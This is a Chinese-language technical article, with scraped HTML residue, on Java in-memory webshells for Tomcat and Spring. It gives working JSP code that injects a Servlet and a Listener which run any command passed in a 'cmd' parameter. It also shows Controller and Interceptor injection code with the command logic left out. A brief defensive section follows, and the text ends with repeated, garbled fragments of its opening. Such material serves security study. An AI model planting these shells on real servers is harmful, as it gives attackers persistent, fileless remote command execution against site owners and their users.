Java内存马分析与实现技术文档<\/h1>

1. 内存马概述<\/h2>
内存马（Memory Shell）是一种驻留在内存中的恶意后门技术，它不依赖磁盘文件，通过动态修改Java Web应用的运行时代码或配置来实现持久化访问。本文详细分析基于Tomcat容器的多种内存马实现技术。<\/p>

2. Servlet内存马<\/h2>

2.1 传统Servlet配置分析<\/h3>
标准Servlet配置示例：<\/p>
<web-app<\/span> xmlns=<\/span>"http:\/\/xmlns.jcp.org\/xml\/ns\/javaee"<\/span> version=<\/span>"4.0"<\/span>><\/span>
<\/span><\/span>  <servlet><\/span>
<\/span><\/span>    <servlet-name><\/span>hello<\/servlet-name><\/span>
<\/span><\/span>    <servlet-class><\/span>com.naihe2.testServlet<\/servlet-class><\/span>
<\/span><\/span>  <\/servlet><\/span>
<\/span><\/span>  <servlet-mapping><\/span>
<\/span><\/span>    <servlet-name><\/span>hello<\/servlet-name><\/span>
<\/span><\/span>    <url-pattern><\/span>\/hello<\/url-pattern><\/span>
<\/span><\/span>  <\/servlet-mapping><\/span>
<\/span><\/span><\/web-app><\/span>
<\/span><\/span><\/code><\/pre>关键加载流程：<\/p>

ContextConfig#webConfig()<\/code> - 读取web.xml配置文件<\/li>
ContextConfig#configureContext()<\/code> - 遍历web.xml内容创建Wrapper<\/li>
StandardContext.createWrapper()<\/code> - 建立URL与Servlet的映射关系<\/li>
<\/ol>
2.2 内存马实现技术<\/h3>
动态注入Servlet内存马JSP代码：<\/p>
<%@ page import="java.lang.reflect.Field,org.apache.catalina.core.StandardContext,
                org.apache.catalina.connector.Request,javax.servlet.http.HttpServlet,
                java.io.*" %>

<%
HttpServlet httpServlet = new HttpServlet() {
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        InputStream is = Runtime.getRuntime().exec(req.getParameter("cmd")).getInputStream();
        BufferedInputStream bis = new BufferedInputStream(is);
        int len;
        while ((len = bis.read()) != -1) {
            resp.getWriter().write(len);
        }
    }
};

\/\/ 获取StandardContext
Field reqF = request.getClass().getDeclaredField("request");
reqF.setAccessible(true);
Request req = (Request) reqF.get(request);
StandardContext stdcontext = (StandardContext) req.getContext();

\/\/ 创建并配置Wrapper
Wrapper newWrapper = stdcontext.createWrapper();
newWrapper.setName(httpServlet.getClass().getSimpleName());
newWrapper.setLoadOnStartup(1);  \/\/ 关键：设置立即加载
newWrapper.setServlet(httpServlet);
newWrapper.setServletClass(httpServlet.getClass().getName());

\/\/ 添加映射
stdcontext.addChild(newWrapper);
stdcontext.addServletMappingDecoded("\/demo", name);
%>
<\/code><\/pre>
关键点：<\/p>

通过反射获取当前请求的StandardContext<\/code>对象<\/li>
使用createWrapper()<\/code>动态创建Servlet包装器<\/li>
setLoadOnStartup(1)<\/code>确保Servlet立即加载<\/li>
添加子容器和URL映射实现持久化<\/li>
<\/ul>
3. Listener内存马<\/h2>
3.1 传统Listener配置<\/h3>
标准配置示例：<\/p>
<web-app<\/span> xmlns=<\/span>"http:\/\/xmlns.jcp.org\/xml\/ns\/javaee"<\/span> version=<\/span>"4.0"<\/span>><\/span>
<\/span><\/span>  <listener><\/span>
<\/span><\/span>    <listener-class><\/span>com.naihe2.testListener<\/listener-class><\/span>
<\/span><\/span>  <\/listener><\/span>
<\/span><\/span><\/web-app><\/span>
<\/span><\/span><\/code><\/pre>加载流程：<\/p>

读取web.xml中的Listener配置<\/li>
通过addApplicationListener<\/code>添加到applicationEventListenersList<\/code><\/li>
事件触发时调用相应方法<\/li>
<\/ol>
3.2 内存马实现技术<\/h3>
动态注入Listener内存马JSP代码：<\/p>
<%@ page import="org.apache.catalina.core.StandardContext,java.lang.reflect.Field,
                org.apache.catalina.connector.Request,java.io.*,org.apache.catalina.connector.Response" %>

<%!
public class DemoListener implements ServletRequestListener {
    public void requestDestroyed(ServletRequestEvent sre) {
        try {
            \/\/ 反射获取Request和Response对象
            org.apache.catalina.connector.RequestFacade req = 
                (org.apache.catalina.connector.RequestFacade) sre.getServletRequest();
            Field requestField = req.getClass().getDeclaredField("request");
            requestField.setAccessible(true);
            Request request = (Request) requestField.get(req);
            Response response = request.getResponse();
            
            \/\/ 执行命令
            String cmd = request.getParameter("cmd");
            InputStream is = Runtime.getRuntime().exec(cmd).getInputStream();
            BufferedInputStream bis = new BufferedInputStream(is);
            int len;
            while ((len = bis.read()) != -1) {
                response.getWriter().write(len);
            }
        } catch (Exception e) { e.printStackTrace(); }
    }
    public void requestInitialized(ServletRequestEvent sre) {}
}
%>

<%
\/\/ 获取StandardContext并注入Listener
Field reqF = request.getClass().getDeclaredField("request");
reqF.setAccessible(true);
Request req = (Request) reqF.get(request);
StandardContext context = (StandardContext) req.getContext();
context.addApplicationEventListener(new DemoListener());
%>
<\/code><\/pre>
关键点：<\/p>

实现ServletRequestListener<\/code>接口捕获请求事件<\/li>
通过双重反射获取原始Request<\/code>和Response<\/code>对象<\/li>
使用addApplicationEventListener<\/code>直接添加监听器实例<\/li>
无需配置web.xml实现持久化<\/li>
<\/ul>
4. Spring框架内存马<\/h2>
4.1 Controller内存马<\/h3>
实现原理：<\/p>

获取Spring的WebApplicationContext<\/code><\/li>
获取RequestMappingHandlerMapping<\/code>实例<\/li>
动态注册Controller映射<\/li>
<\/ol>
内存马实现代码：<\/p>
@Controller<\/span>
<\/span><\/span>public<\/span> class<\/span> Demo<\/span> {<\/span>
<\/span><\/span>    @ResponseBody<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>value=<\/span>"\/inject"<\/span>,<\/span> method=<\/span>RequestMethod.<\/span>GET<\/span>)<\/span>
<\/span><\/span>    public<\/span> void<\/span> inject<\/span>()<\/span> throws<\/span> NoSuchMethodException {<\/span>
<\/span><\/span>        \/\/ 获取Spring上下文
<\/span><\/span><\/span><\/span>        WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder
<\/span><\/span>            .<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>            .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 获取HandlerMapping
<\/span><\/span><\/span><\/span>        RequestMappingHandlerMapping mappingHandlerMapping =<\/span> 
<\/span><\/span>            context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 准备映射信息
<\/span><\/span><\/span><\/span>        Method method =<\/span> InjectToController.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"test"<\/span>);<\/span>
<\/span><\/span>        PatternsRequestCondition url =<\/span> new<\/span> PatternsRequestCondition(<\/span>"\/demo"<\/span>);<\/span>
<\/span><\/span>        RequestMethodsRequestCondition ms =<\/span> new<\/span> RequestMethodsRequestCondition();<\/span>
<\/span><\/span>        RequestMappingInfo info =<\/span> new<\/span> RequestMappingInfo(<\/span>url,<\/span> ms,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 注册Controller
<\/span><\/span><\/span><\/span>        mappingHandlerMapping.<\/span>registerMapping<\/span>(<\/span>info,<\/span> new<\/span> InjectToController(),<\/span> method);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> class<\/span> InjectToController<\/span> {<\/span>
<\/span><\/span>        public<\/span> String test<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>            HttpServletRequest request =<\/span> ((<\/span>ServletRequestAttributes)<\/span>
<\/span><\/span>                RequestContextHolder.<\/span>currentRequestAttributes<\/span>()).<\/span>getRequest<\/span>();<\/span>
<\/span><\/span>            \/\/ 命令执行逻辑...
<\/span><\/span><\/span><\/span>            return<\/span> "result"<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.2 Interceptor内存马<\/h3>
实现原理：<\/p>

获取Spring上下文和AbstractHandlerMapping<\/code><\/li>
通过反射修改adaptedInterceptors<\/code>列表<\/li>
添加自定义Interceptor<\/li>
<\/ol>
内存马实现代码：<\/p>
@Controller<\/span>
<\/span><\/span>public<\/span> class<\/span> TestInterceptor<\/span> {<\/span>
<\/span><\/span>    @ResponseBody<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>value=<\/span>"\/interceptor"<\/span>,<\/span> method=<\/span>RequestMethod.<\/span>GET<\/span>)<\/span>
<\/span><\/span>    public<\/span> String inject<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 获取上下文和HandlerMapping
<\/span><\/span><\/span><\/span>        WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span>RequestContextHolder
<\/span><\/span>            .<\/span>currentRequestAttributes<\/span>()<\/span>
<\/span><\/span>            .<\/span>getAttribute<\/span>(<\/span>"org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        AbstractHandlerMapping abstractHandlerMapping =<\/span> (<\/span>AbstractHandlerMapping)<\/span>
<\/span><\/span>            context.<\/span>getBean<\/span>(<\/span>"org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 反射修改拦截器列表
<\/span><\/span><\/span><\/span>        Field field =<\/span> AbstractHandlerMapping.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"adaptedInterceptors"<\/span>);<\/span>
<\/span><\/span>        field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        ArrayList<<\/span>HandlerInterceptor><\/span> adaptedInterceptors =<\/span> 
<\/span><\/span>            (<\/span>ArrayList<<\/span>HandlerInterceptor>)<\/span> field.<\/span>get<\/span>(<\/span>abstractHandlerMapping);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 添加自定义拦截器
<\/span><\/span><\/span><\/span>        adaptedInterceptors.<\/span>add<\/span>(<\/span>new<\/span> MappedInterceptor(<\/span>
<\/span><\/span>            new<\/span> String[]{<\/span>"\/cl1"<\/span>},<\/span> null<\/span>,<\/span> new<\/span> InterceptorDemo()));<\/span>
<\/span><\/span>        
<\/span><\/span>        return<\/span> "ok"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>class<\/span> InterceptorDemo<\/span> implements<\/span> HandlerInterceptor {<\/span>
<\/span><\/span>    public<\/span> boolean<\/span> preHandle<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response,<\/span> 
<\/span><\/span>                           Object handler)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 命令执行逻辑...
<\/span><\/span><\/span><\/span>        return<\/span> false<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ 其他方法实现...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. 防御措施<\/h2>


运行时检测<\/strong>：<\/p>

监控StandardContext<\/code>的修改操作<\/li>
检查动态添加的Servlet\/Filter\/Listener<\/li>
扫描异常的URL映射<\/li>
<\/ul>
<\/li>

Spring防护<\/strong>：<\/p>

禁止动态注册Controller<\/li>
监控HandlerMapping修改<\/li>
检查异常Interceptor<\/li>
<\/ul>
<\/li>

通用防护<\/strong>：<\/p>

使用RASP进行行为监控<\/li>
定期内存扫描<\/li>
严格权限控制<\/li>
<\/ul>
<\/li>
<\/ol>
6. 总结<\/h2>
本文详细分析了基于Tomcat和Spring框架的多种内存马实现技术，包括：<\/p>

Servlet内存马：通过动态添加Wrapper实现<\/li>
Listener内存马：利用事件监听机制<\/li>
Spring Controller内存马：动态注册映射<\/li>
Interceptor内存马：修改拦截器链<\/li>
<\/ul>
理解这些技术原理有助于开发更有效的防御措施，保护Java Web应用免受内存马攻击。<\/p>
Java内存马分析与实现技术文档<\/h1>

1. 内存马概述<\/h2> 内存马（Memory Shell）是一种驻留在内存中的恶意后门技术，它不依赖磁盘文件，通过动态修改Java Web应用的运行时代码或配置来实现持久化访问。本文详细分析基于Tomcat容器的多种内存马实现技术。<\/p>

2. Servlet内存马<\/h2>

3. Listener内存马<\/h2>

4. Spring框架内存马<\/h2>

1. 内存马概述<\/h2>
内存马（Memory Shell）是一种驻留在内存中的恶意后门技术，它不依赖磁盘文件，通过动态修改Java Web应用的运行时代码或配置来实现持久化访问。本文详细分析基于Tomcat容器的多种内存马实现技术。<\/p>
